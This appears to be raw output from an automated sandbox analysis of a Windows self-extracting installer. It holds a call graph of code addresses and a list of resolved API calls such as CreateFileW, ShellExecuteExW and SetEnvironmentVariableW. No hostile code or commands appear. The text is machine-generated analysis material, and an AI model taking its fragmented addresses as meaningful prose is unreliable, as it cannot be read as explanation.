8593->8594 8595 4076c6 IsWindow 8594->8595 8596 4076ef 8595->8596 8597 4076dd IsBadReadPtr 8595->8597 8598 4073d1 21 API calls 8596->8598 8597->8596 8598->8592 8600 40db1f 2 API calls 8599->8600 8601 401857 8600->8601 8601->8390 8601->8391 8607 40d985 8602->8607 8605 40da65 CreateFileW 8606 40da8a 8605->8606 8606->8342 8608 40d98f CloseHandle 8607->8608 8609 40d99a 8607->8609 8608->8609 8609->8605 8609->8606 8611 40af0c 8610->8611 8626 408ebd 8610->8626 8611->8626 8701 40ac7a 8611->8701 8613 40af3f 8614 
40ac7a 7 API calls 8613->8614 8615 40b0cb 8613->8615 8619 40af96 8614->8619 8617 40e959 ctype 4 API calls 8615->8617 8616 40afbd 8708 40e959 8616->8708 8617->8626 8619->8615 8619->8616 8620 40b043 8621 40e959 ctype 4 API calls 8620->8621 8624 40b07f 8621->8624 8622 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8623 40afc6 8622->8623 8623->8620 8623->8622 8625 40e959 ctype 4 API calls 8624->8625 8625->8626 8626->8290 8627 4065ea InitializeCriticalSection 8626->8627 8627->8302 8720 4086f0 8628->8720 8672 40cdc7 8671->8672 8673 408761 4 API calls 8672->8673 8674 40cdde 8673->8674 8674->8302 8702 40e8da ctype 3 API calls 8701->8702 8703 40ac86 8702->8703 8712 40e811 8703->8712 8705 40aca2 8705->8613 8706 409403 4 API calls 8707 40ac90 8706->8707 8707->8705 8707->8706 8709 40e93b 8708->8709 8710 40e8da ctype 3 API calls 8709->8710 8711 40e943 ??3@YAXPAX 8710->8711 8711->8623 8713 40e8a5 8712->8713 8714 40e824 8712->8714 8713->8707 8715 40e833 _CxxThrowException 8714->8715 8716 40e863 ??2@YAPAXI 8714->8716 8717 40e895 ??3@YAXPAX 8714->8717 8715->8714 8716->8714 8718 40e879 memcpy 8716->8718 8717->8713 8718->8717 8721 40e8da ctype 3 API calls 8720->8721 8722 4086f8 8721->8722 8723 40e8da ctype 3 API calls 8722->8723 8724 408700 8723->8724 8725 40e8da ctype 3 API calls 8724->8725 8726 408708 8725->8726 9015 40dace 9018 40daac 9015->9018 9021 40da8f 9018->9021 9022 40da56 2 API calls 9021->9022 9023 40daa9 9022->9023 9005 40dadc ReadFile 9024 411def __set_app_type __p__fmode __p__commode 9025 411e5e 9024->9025 9026 411e72 9025->9026 9027 411e66 __setusermatherr 9025->9027 9036 411f66 _controlfp 9026->9036 9027->9026 9029 411e77 _initterm __getmainargs _initterm 9030 411ecb GetStartupInfoA 9029->9030 9032 411eff GetModuleHandleA 9030->9032 9037 4064af _EH_prolog 9032->9037 9036->9029 9040 404faa 9037->9040 9345 401b37 GetModuleHandleW CreateWindowExW 9040->9345 9043 404fdc 9044 40648e MessageBoxA 9043->9044 9046 404ff6 9043->9046 9045 4064a5 exit _XcptFilter 
9044->9045 9047 401411 2 API calls 9046->9047 9048 40502d 9047->9048 9049 401411 2 API calls 9048->9049 9050 405035 9049->9050 9348 403e23 9050->9348 9055 40254d 2 API calls 9056 405073 9055->9056 9357 402a69 9056->9357 9058 40507c 9371 403d71 9058->9371 9061 40509b _wtol 9063 4050b1 9061->9063 9376 404405 9063->9376 9064 4050d6 9065 403d71 6 API calls 9064->9065 9066 4050e1 9065->9066 9067 4050e7 9066->9067 9068 405118 9066->9068 9543 404996 9067->9543 9069 405130 GetModuleFileNameW 9068->9069 9071 40112b 2 API calls 9068->9071 9072 405151 9069->9072 9073 405142 9069->9073 9071->9069 9078 403d71 6 API calls 9072->9078 9075 407776 55 API calls 9073->9075 9074 4050ee ??3@YAXPAX 9561 403e70 9074->9561 9083 4050ec 9075->9083 9077 4050ff ??3@YAXPAX ??3@YAXPAX 9077->9045 9090 405173 9078->9090 9079 4052d5 9080 401362 2 API calls 9079->9080 9081 4052e5 9080->9081 9082 401362 2 API calls 9081->9082 9087 4052f2 9082->9087 9083->9074 9084 4051fa 9084->9083 9085 40522a 9084->9085 9089 405213 _wtol 9084->9089 9086 403d71 6 API calls 9085->9086 9095 405289 9086->9095 9088 40538d ??2@YAPAXI 9087->9088 9091 401329 2 API calls 9087->9091 9097 405399 9088->9097 9089->9085 9090->9079 9090->9083 9090->9084 9090->9085 9094 401429 2 API calls 9090->9094 9092 405327 9091->9092 9093 401329 2 API calls 9092->9093 9099 40533d 9093->9099 9094->9090 9095->9079 9096 404594 2 API calls 9095->9096 9098 4052ba 9096->9098 9100 4053cf 9097->9100 9104 407776 55 API calls 9097->9104 9098->9079 9102 401362 2 API calls 9098->9102 9103 401362 2 API calls 9099->9103 9401 4025ae 9100->9401 9102->9079 9106 405367 9103->9106 9104->9100 9108 401f9d 19 API calls 9106->9108 9107 4025ae 2 API calls 9110 4053f6 9107->9110 9109 40536e 9108->9109 9111 40254d 2 API calls 9109->9111 9112 4025ae 2 API calls 9110->9112 9113 405377 9111->9113 9114 4053fe 9112->9114 9113->9088 9404 404e3f 9114->9404 9119 40546f 9121 405534 9119->9121 9124 403d71 6 API calls 9119->9124 9120 402844 10 API calls 9122 405441 9120->9122 
9123 40e8da ctype 3 API calls 9121->9123 9122->9119 9127 407776 55 API calls 9122->9127 9125 40553c 9123->9125 9126 405493 9124->9126 9128 405573 9125->9128 9592 403093 9125->9592 9126->9121 9134 40549d 9126->9134 9129 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9127->9129 9131 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9128->9131 9132 40557c 9128->9132 9129->9119 9131->9074 9131->9083 9136 405588 wsprintfW 9132->9136 9137 4055ed 9132->9137 9143 401411 2 API calls 9132->9143 9144 401329 ??2@YAPAXI ??3@YAXPAX 9132->9144 9147 401f9d 19 API calls 9132->9147 9626 402f6c ??2@YAPAXI 9132->9626 9632 402425 ??3@YAXPAX ??3@YAXPAX 9132->9632 9134->9131 9566 404cbc 9134->9566 9135 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9138 4054f5 9135->9138 9139 401411 2 API calls 9136->9139 9432 404603 9137->9432 9138->9131 9139->9132 9142 4054cc 9142->9131 9145 407776 55 API calls 9142->9145 9143->9132 9144->9132 9146 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9145->9146 9146->9138 9147->9132 9148 40584a 9149 404603 26 API calls 9148->9149 9182 40586a 9149->9182 9151 403b94 lstrlenW lstrlenW _wcsnicmp 9176 4055f6 9151->9176 9154 405933 9494 404034 9154->9494 9155 4024fc 2 API calls 9155->9182 9159 4059d8 CoInitialize 9166 40243b lstrcmpW 9159->9166 9160 40595a 9163 40243b lstrcmpW 9160->9163 9161 405935 ??3@YAXPAX 9161->9154 9165 405969 9163->9165 9164 401411 ??2@YAPAXI ??3@YAXPAX 9164->9182 9167 405979 9165->9167 9169 401f9d 19 API calls 9165->9169 9168 4059fe 9166->9168 9659 403b40 9167->9659 9170 405a12 9168->9170 9173 401329 2 API calls 9168->9173 9169->9167 9500 403b59 9170->9500 9172 401362 2 API calls 9172->9182 9173->9170 9176->9148 9176->9151 9192 4057dd _wtol 9176->9192 9208 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9176->9208 9633 40484d 9176->9633 9644 40408b 9176->9644 9178 4073d1 21 API calls 9181 40599c ctype 9178->9181 9179 401329 2 API calls 9179->9182 9180 405a4d 9184 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9180->9184 9222 405a61 9180->9222 9679 4082e9 9180->9679 9185 4059a7 
??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9181->9185 9182->9154 9182->9155 9182->9161 9182->9164 9182->9172 9182->9179 9187 402f6c 7 API calls 9182->9187 9491 40243b 9182->9491 9658 402425 ??3@YAXPAX ??3@YAXPAX 9182->9658 9184->9180 9185->9083 9187->9182 9189 405910 ??3@YAXPAX 9189->9182 9190 401411 2 API calls 9190->9222 9192->9176 9193 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213 405bf3 9193->9213 9194 405a9f GetKeyState 9194->9222 9195 405c6c 9197 405ca2 9195->9197 9198 405c74 9195->9198 9196 40243b lstrcmpW 9196->9222 9201 4012f7 2 API calls 9197->9201 9721 403f85 9198->9721 9202 405cb0 9201->9202 9205 403b59 15 API calls 9202->9205 9209 405cb9 9205->9209 9206 407776 55 API calls 9210 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9206->9210 9207 401362 2 API calls 9211 405c91 ??3@YAXPAX 9207->9211 9208->9083 9212 405cca ??3@YAXPAX 9209->9212 9216 401362 2 API calls 9209->9216 9210->9213 9217 405cd9 9211->9217 9212->9217 9213->9206 9214 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213->9214 9214->9213 9215 405bcd ??3@YAXPAX 9215->9222 9216->9212 9219 405d24 9217->9219 9220 405d16 9217->9220 9218 401329 ??2@YAPAXI ??3@YAXPAX 9218->9222 9734 40786b 9219->9734 9507 404a44 9220->9507 9222->9190 9222->9193 9222->9194 9222->9195 9222->9196 9222->9213 9222->9214 9222->9215 9222->9218 9224 401429 ??2@YAPAXI ??3@YAXPAX 9222->9224 9706 407613 9222->9706 9715 407674 9222->9715 9224->9222 9225 405d20 9226 405d65 9225->9226 9740 403e0d 9225->9740 9227 404034 21 API calls 9226->9227 9229 405d77 9227->9229 9231 401411 2 API calls 9229->9231 9232 406373 9229->9232 9233 405d95 9231->9233 9234 4063f7 ctype 9232->9234 9237 40243b lstrcmpW 9232->9237 9277 405da8 9233->9277 9744 40453e 9233->9744 9236 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9234->9236 9242 40243b lstrcmpW 9234->9242 9239 406461 9236->9239 9240 406467 ??3@YAXPAX 9236->9240 9238 4063a4 9237->9238 9238->9234 9761 403f48 9238->9761 9239->9240 9241 403e70 ctype 4 API calls 9240->9241 9243 406478 ??3@YAXPAX 
??3@YAXPAX 9241->9243 9245 406416 9242->9245 9243->9045 9244 401411 ??2@YAPAXI ??3@YAXPAX 9244->9277 9245->9236 9249 406423 9245->9249 9248 405dd8 9252 405de5 9248->9252 9253 4061fa ??3@YAXPAX ??3@YAXPAX 9248->9253 9250 4012f7 2 API calls 9249->9250 9255 406432 9250->9255 9251 4073d1 21 API calls 9256 4063e0 ??3@YAXPAX 9251->9256 9753 4043c6 9252->9753 9257 406312 9253->9257 9254 40243b lstrcmpW 9254->9277 9766 404aff 9255->9766 9256->9234 9260 40636a ??3@YAXPAX 9257->9260 9263 404034 21 API calls 9257->9263 9259 405e45 9265 401329 2 API calls 9259->9265 9260->9232 9268 406321 9263->9268 9269 405e4e 9265->9269 9266 4043c6 2 API calls 9267 405e0e 9266->9267 9270 401362 2 API calls 9267->9270 9533 4048ab 9268->9533 9274 403b7f 19 API calls 9269->9274 9275 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9270->9275 9272 40626b ??3@YAXPAX ??3@YAXPAX 9272->9257 9273 401329 2 API calls 9273->9277 9290 405e57 9274->9290 9278 406211 9275->9278 9279 405e41 9275->9279 9276 40633a SetCurrentDirectoryW 9280 4048ab 4 API calls 9276->9280 9277->9244 9277->9248 9277->9254 9277->9259 9277->9272 9277->9273 9281 401429 2 API calls 9277->9281 9284 403e0d 16 API calls 9278->9284 9279->9259 9282 406362 9280->9282 9283 405ee5 ??3@YAXPAX ??3@YAXPAX 9281->9283 9285 403e0d 16 API calls 9282->9285 9283->9277 9286 406216 9284->9286 9285->9260 9287 407776 55 API calls 9286->9287 9288 40621f 7 API calls 9287->9288 9289 40625e 9288->9289 9289->9272 9291 405f61 _wtol 9290->9291 9292 403bce lstrlenW lstrlenW _wcsnicmp 9290->9292 9293 406025 9290->9293 9291->9290 9292->9290 9294 406080 9293->9294 9295 40602e 9293->9295 9296 401362 2 API calls 9294->9296 9297 406053 9295->9297 9298 406034 9295->9298 9299 40607e 9296->9299 9301 401329 2 API calls 9297->9301 9300 401329 2 API calls 9298->9300 9302 40254d 2 API calls 9299->9302 9303 40603f 9300->9303 9304 406051 9301->9304 9305 406092 9302->9305 9306 40254d 2 API calls 9303->9306 9307 40243b lstrcmpW 9304->9307 9308 401411 2 API calls 9305->9308 9309 
406048 9306->9309 9310 406068 9307->9310 9311 40609a 9308->9311 9312 40254d 2 API calls 9309->9312 9310->9305 9314 40254d 2 API calls 9310->9314 9313 401411 2 API calls 9311->9313 9312->9304 9315 4060a2 memset 9313->9315 9314->9299 9316 4060e1 9315->9316 9317 404594 2 API calls 9316->9317 9318 4060fe 9317->9318 9319 401329 2 API calls 9318->9319 9320 406109 9319->9320 9321 403b7f 19 API calls 9320->9321 9322 406112 9321->9322 9323 4061b1 9322->9323 9527 4021ed 9322->9527 9325 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9325 9327 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9327 9325->9257 9327->9253 9328 406150 9330 403b7f 19 API calls 9328->9330 9329 401429 2 API calls 9331 406147 9329->9331 9332 406168 ShellExecuteExW 9330->9332 9334 40254d 2 API calls 9331->9334 9335 406282 9332->9335 9336 40618c 9332->9336 9334->9328 9339 407776 55 API calls 9335->9339 9337 4061a0 CloseHandle 9336->9337 9338 406192 WaitForSingleObject 9336->9338 9758 402185 9337->9758 9338->9337 9341 40628c 9339->9341 9342 403e0d 16 API calls 9341->9342 9343 406291 9 API calls 9342->9343 9344 4062e1 9343->9344 9344->9325 9346 401b6c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9345->9346 9347 401b9f GetVersionExW 9345->9347 9346->9347 9347->9043 9347->9044 9349 40112b 2 API calls 9348->9349 9350 403e38 GetCommandLineW 9349->9350 9351 404594 9350->9351 9352 4045ce 9351->9352 9355 4045a2 9351->9355 9354 401429 2 API calls 9352->9354 9356 4045c6 9352->9356 9353 401429 2 API calls 9353->9355 9354->9352 9355->9353 9355->9356 9356->9055 9358 401411 2 API calls 9357->9358 9364 402a79 9358->9364 9359 401362 2 API calls 9360 402b6c ??3@YAXPAX 9359->9360 9360->9058 9361 402b5f 9361->9359 9363 401411 2 API calls 9363->9364 9364->9361 9364->9363 9365 401429 ??2@YAPAXI ??3@YAXPAX 9364->9365 9367 401362 2 API calls 9364->9367 9805 4025c6 9364->9805 9808 40272e 9364->9808 9365->9364 9368 402ad9 ??3@YAXPAX 9367->9368 9369 4013e2 2 API calls 9368->9369 9370 
402aee ??3@YAXPAX ??3@YAXPAX 9369->9370 9370->9364 9372 403d80 9371->9372 9373 403dbd 9372->9373 9374 403d9a lstrlenW lstrlenW 9372->9374 9373->9061 9373->9063 9819 401a85 9374->9819 9377 401f47 3 API calls 9376->9377 9378 404416 9377->9378 9379 401f9d 19 API calls 9378->9379 9380 40441d 9379->9380 9381 401f9d 19 API calls 9380->9381 9382 404429 9381->9382 9383 401f9d 19 API calls 9382->9383 9384 404435 9383->9384 9385 401f9d 19 API calls 9384->9385 9386 404441 9385->9386 9387 401f9d 19 API calls 9386->9387 9388 40444d 9387->9388 9389 401f9d 19 API calls 9388->9389 9390 404459 9389->9390 9391 401f9d 19 API calls 9390->9391 9392 404465 9391->9392 9393 404480 SHGetSpecialFolderPathW 9392->9393 9396 404533 #17 9392->9396 9397 401411 2 API calls 9392->9397 9398 401329 ??2@YAPAXI ??3@YAXPAX 9392->9398 9400 402f6c 7 API calls 9392->9400 9824 402425 ??3@YAXPAX ??3@YAXPAX 9392->9824 9393->9392 9394 40449a wsprintfW 9393->9394 9395 401411 2 API calls 9394->9395 9395->9392 9396->9064 9397->9392 9398->9392 9400->9392 9402 4022b0 2 API calls 9401->9402 9403 4025c2 9402->9403 9403->9107 9825 403e86 9404->9825 9406 404e56 9407 403e86 2 API calls 9406->9407 9408 404e65 9407->9408 9829 404343 9408->9829 9412 404e82 ??3@YAXPAX 9413 404343 3 API calls 9412->9413 9414 404e9d 9413->9414 9415 403ec1 2 API calls 9414->9415 9416 404ea8 ??3@YAXPAX wsprintfA 9415->9416 9845 403ef6 9416->9845 9418 404ed0 9419 403ef6 2 API calls 9418->9419 9420 404edb 9419->9420 9421 402844 9420->9421 9422 402851 9421->9422 9430 40dcfb 3 API calls 9422->9430 9423 402863 lstrlenA lstrlenA 9428 402890 9423->9428 9424 40296e 9424->9119 9424->9120 9425 40293b memmove 9425->9424 9425->9428 9426 4028db memcmp 9426->9424 9426->9428 9427 402918 memcmp 9427->9428 9428->9424 9428->9425 9428->9426 9428->9427 9431 40dcc7 GetLastError 9428->9431 9856 402640 9428->9856 9430->9423 9431->9428 9433 40243b lstrcmpW 9432->9433 9434 40461c 9433->9434 9435 40466c 9434->9435 9437 401329 2 API calls 9434->9437 9436 40243b lstrcmpW 
9435->9436 9438 40468a 9436->9438 9439 404633 9437->9439 9442 40243b lstrcmpW 9438->9442 9440 401f9d 19 API calls 9439->9440 9441 40463a 9440->9441 9444 40254d 2 API calls 9441->9444 9443 4046a2 9442->9443 9446 40243b lstrcmpW 9443->9446 9445 404643 9444->9445 9447 401329 2 API calls 9445->9447 9448 4046ba 9446->9448 9449 40465c 9447->9449 9451 40243b lstrcmpW 9448->9451 9450 401f9d 19 API calls 9449->9450 9452 404663 9450->9452 9453 4046d2 9451->9453 9454 40254d 2 API calls 9452->9454 9455 4046e9 9453->9455 9456 4046d9 lstrcmpiW 9453->9456 9454->9435 9457 40243b lstrcmpW 9455->9457 9456->9455 9458 4046ff 9457->9458 9459 40243b lstrcmpW 9458->9459 9460 40472c 9459->9460 9461 404739 9460->9461 9859 403d1f 9460->9859 9463 40243b lstrcmpW 9461->9463 9467 40474d 9463->9467 9464 40476d 9465 40243b lstrcmpW 9464->9465 9472 404780 9465->9472 9467->9464 9468 40243b lstrcmpW 9467->9468 9863 403cc6 9467->9863 9468->9467 9469 4047a0 9471 40243b lstrcmpW 9469->9471 9473 4047ac 9471->9473 9472->9469 9474 40243b lstrcmpW 9472->9474 9867 403cf7 9472->9867 9475 40243b lstrcmpW 9473->9475 9474->9472 9476 4047bd 9475->9476 9477 40243b lstrcmpW 9476->9477 9478 4047ce 9477->9478 9479 4047e4 9478->9479 9480 4047db _wtol 9478->9480 9481 40243b lstrcmpW 9479->9481 9480->9479 9482 4047f0 9481->9482 9483 404800 9482->9483 9484 4047f7 _wtol 9482->9484 9485 40243b lstrcmpW 9483->9485 9484->9483 9486 40480c 9485->9486 9487 40243b lstrcmpW 9486->9487 9488 404824 9487->9488 9489 40243b lstrcmpW 9488->9489 9490 40483c 9489->9490 9490->9176 9875 4023dd 9491->9875 9495 404045 9494->9495 9496 404088 9494->9496 9497 4012f7 2 API calls 9495->9497 9498 403b7f 19 API calls 9495->9498 9496->9159 9496->9160 9497->9495 9499 404062 SetEnvironmentVariableW ??3@YAXPAX 9498->9499 9499->9495 9499->9496 9501 40393b 7 API calls 9500->9501 9502 403b69 9501->9502 9503 4039f6 7 API calls 9502->9503 9504 403b74 9503->9504 9505 4027c7 6 API calls 9504->9505 9506 403b7a 9505->9506 9506->9180 9662 4083b6 9506->9662 
9879 408676 9507->9879 9509 404a55 ??2@YAPAXI 9510 404a64 9509->9510 9524 40dcfb 3 API calls 9510->9524 9511 404a85 9881 40b2fc 9511->9881 9887 40a7de _EH_prolog 9511->9887 9512 404a95 9513 404ab3 9512->9513 9514 404a99 9512->9514 9516 404ada ??2@YAPAXI 9513->9516 9519 403354 86 API calls 9513->9519 9515 407776 55 API calls 9514->9515 9523 404aa1 9515->9523 9517 404ae6 9516->9517 9518 404aed 9516->9518 9922 404292 9517->9922 9903 40150b 9518->9903 9521 404ac6 9519->9521 9521->9516 9521->9523 9523->9225 9524->9511 9528 402200 LoadLibraryA GetProcAddress 9527->9528 9529 4021fb 9527->9529 9530 40221b 9528->9530 9531 402223 9528->9531 9529->9323 9529->9328 9529->9329 9530->9529 9531->9530 10385 4021b9 LoadLibraryA GetProcAddress 9531->10385 9534 401411 2 API calls 9533->9534 9541 4048bc 9534->9541 9535 401329 2 API calls 9535->9541 9536 40494e 9537 404988 ??3@YAXPAX 9536->9537 9539 4048ab 3 API calls 9536->9539 9537->9276 9538 401429 2 API calls 9538->9541 9540 404985 9539->9540 9540->9537 9541->9535 9541->9536 9541->9538 9542 40243b lstrcmpW 9541->9542 9542->9541 9544 40661a 2 API calls 9543->9544 9545 4049af 9544->9545 9546 401f9d 19 API calls 9545->9546 9547 4049bd 9546->9547 9548 4024fc 2 API calls 9547->9548 9549 4049c7 9548->9549 9550 4049fd 9549->9550 9552 40254d ??2@YAPAXI ??3@YAXPAX 9549->9552 9551 40254d 2 API calls 9550->9551 9553 404a0a 9551->9553 9552->9549 9554 401f9d 19 API calls 9553->9554 9555 404a11 9554->9555 9556 40254d 2 API calls 9555->9556 9557 404a1b 9556->9557 9558 4073d1 21 API calls 9557->9558 9559 404a30 ??3@YAXPAX 9558->9559 9560 404a41 ctype 9559->9560 9560->9083 9562 40e8da ctype 3 API calls 9561->9562 9563 403e7e 9562->9563 9564 40e8da ctype 3 API calls 9563->9564 9565 40e943 ??3@YAXPAX 9564->9565 9565->9077 9567 40db53 2 API calls 9566->9567 9568 404ce8 9567->9568 9569 404d44 9568->9569 9571 4024fc 2 API calls 9568->9571 9570 4025ae 2 API calls 9569->9570 9572 404d4c 9570->9572 9573 404cf7 9571->9573 9574 403e86 2 API calls 9572->9574 
9577 404db5 ??3@YAXPAX 9573->9577 9579 403354 86 API calls 9573->9579 9575 404d59 9574->9575 9576 403ef6 2 API calls 9575->9576 9578 404d66 9576->9578 9591 404db1 9577->9591 9580 403ef6 2 API calls 9578->9580 9581 404d1b 9579->9581 9582 404d73 9580->9582 9581->9577 9584 40db53 2 API calls 9581->9584 9583 403ef6 2 API calls 9582->9583 9585 404d80 9583->9585 9586 404d37 9584->9586 9587 40dd5f 2 API calls 9585->9587 9586->9577 9588 404d3b ??3@YAXPAX 9586->9588 9589 404d94 9587->9589 9588->9569 9589->9577 9590 404d9d ??3@YAXPAX 9589->9590 9590->9591 9591->9142 9593 4025ae 2 API calls 9592->9593 9609 4030a8 9593->9609 9594 403301 9595 403344 ??3@YAXPAX 9594->9595 9596 40334e 9595->9596 9596->9128 9596->9135 9597 401411 ??2@YAPAXI ??3@YAXPAX 9597->9609 9599 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9599->9609 9600 401362 2 API calls 9601 4030f3 ??3@YAXPAX ??3@YAXPAX 9600->9601 9602 403303 9601->9602 9601->9609 10393 4029c3 9602->10393 9606 40331c ??3@YAXPAX 9606->9596 9607 4031e5 strncmp 9608 4031d0 strncmp 9607->9608 9607->9609 9608->9607 9608->9609 9609->9594 9609->9597 9609->9599 9609->9600 9609->9602 9609->9607 9610 401362 2 API calls 9609->9610 9611 402640 2 API calls 9609->9611 9614 402640 ??2@YAPAXI ??3@YAXPAX 9609->9614 9616 4023dd lstrcmpW 9609->9616 9617 402f6c 7 API calls 9609->9617 9619 403330 9609->9619 9620 4032b2 lstrcmpW 9609->9620 9624 401329 2 API calls 9609->9624 10387 402986 9609->10387 10392 402425 ??3@YAXPAX ??3@YAXPAX 9609->10392 9612 403252 ??3@YAXPAX 9610->9612 9611->9608 9613 402a69 9 API calls 9612->9613 9615 403263 lstrcmpW 9613->9615 9614->9609 9615->9609 9616->9609 9617->9609 9622 402f6c 7 API calls 9619->9622 9620->9609 9621 4032c0 lstrcmpW 9620->9621 9621->9609 9623 40333c 9622->9623 10411 402425 ??3@YAXPAX ??3@YAXPAX 9623->10411 9624->9609 9627 402f86 9626->9627 9628 402f7b 9626->9628 9630 408761 4 API calls 9627->9630 10413 402668 9628->10413 9631 402f92 9630->9631 9631->9132 9632->9132 9634 4024fc 2 API calls 9633->9634 9635 
40485f 9634->9635 9636 40254d 2 API calls 9635->9636 9637 40486c 9636->9637 9638 404888 9637->9638 9639 401429 2 API calls 9637->9639 9640 40254d 2 API calls 9638->9640 9639->9637 9641 404892 9640->9641 9642 40408b 94 API calls 9641->9642 9643 40489d ??3@YAXPAX 9642->9643 9643->9176 9645 4040a2 lstrlenW 9644->9645 9646 4040ce 9644->9646 9647 401a85 4 API calls 9645->9647 9646->9176 9648 4040b8 9647->9648 9648->9645 9648->9646 9649 4040d5 9648->9649 9650 4024fc 2 API calls 9649->9650 9653 4040de 9650->9653 10418 402776 9653->10418 9654 403093 84 API calls 9655 40414c 9654->9655 9656 404156 ??3@YAXPAX ??3@YAXPAX 9655->9656 9657 40416d ??3@YAXPAX ??3@YAXPAX 9655->9657 9656->9646 9657->9646 9658->9189 9660 40661a 2 API calls 9659->9660 9661 403b48 9660->9661 9661->9178 9663 408646 9662->9663 9675 4083d5 ctype 9662->9675 9663->9184 9664 40661a 2 API calls 9664->9675 9665 40786b 23 API calls 9665->9675 9666 40243b lstrcmpW 9666->9675 9668 407674 23 API calls 9668->9675 9669 407613 23 API calls 9669->9675 9670 403b40 2 API calls 9670->9675 9671 401f9d 19 API calls 9671->9675 9672 407776 55 API calls 9672->9675 9673 403f48 4 API calls 9673->9675 9674 4073d1 21 API calls 9674->9675 9675->9663 9675->9664 9675->9665 9675->9666 9675->9668 9675->9669 9675->9670 9675->9671 9675->9672 9675->9673 9675->9674 9676 407717 25 API calls 9675->9676 9677 4073d1 21 API calls 9675->9677 10428 40744b 9675->10428 9676->9675 9678 408476 ??3@YAXPAX 9677->9678 9678->9675 9680 40243b lstrcmpW 9679->9680 9681 4082fd 9680->9681 9682 40830b 9681->9682 10432 4019f0 GetStdHandle WriteFile 9681->10432 9684 40831e 9682->9684 10433 4019f0 GetStdHandle WriteFile 9682->10433 9686 408333 9684->9686 10434 4019f0 GetStdHandle WriteFile 9684->10434 9688 408344 9686->9688 10435 4019f0 GetStdHandle WriteFile 9686->10435 9690 40243b lstrcmpW 9688->9690 9691 408351 9690->9691 9694 40835f 9691->9694 10436 4019f0 GetStdHandle WriteFile 9691->10436 9693 40243b lstrcmpW 9695 40836c 9693->9695 9694->9693 9696 40837a 
APIs
  • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
  • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
  • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
  • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
  • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
  • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
  • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
• GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
• GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
• _wtol.MSVCRT ref: 0040509F
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
• GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
• _wtol.MSVCRT ref: 00405217
• ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
  • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
  • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
  • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
  • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
  • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
  • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
